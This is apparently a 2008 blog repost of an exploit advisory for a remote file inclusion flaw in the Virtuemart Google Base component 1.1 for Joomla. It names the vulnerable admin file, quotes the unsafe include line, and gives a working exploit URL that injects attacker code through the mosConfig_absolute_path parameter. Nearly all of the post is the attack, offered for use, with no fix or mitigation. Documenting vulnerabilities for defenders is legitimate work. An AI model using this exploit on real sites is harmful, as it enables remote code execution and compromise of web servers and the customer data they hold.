Home vulnerabilities Virtuemart Google Base Component 1.1 - RFI

Virtuemart Google Base Component 1.1 - RFI

By
Tuesday, November 04, 2008
Read
Add Comment

[o] Virtuemart Google Base Component 1.1 Remote File Inclusion Vulnerability
Software : com_googlebase version 1.1
Vendor   : http://www.joomlahacks.com/
Author   : NoGe


[o] Vulnerable file
administrator/components/com_googlebase/admin.googlebase.php
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );


[o] Exploit
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us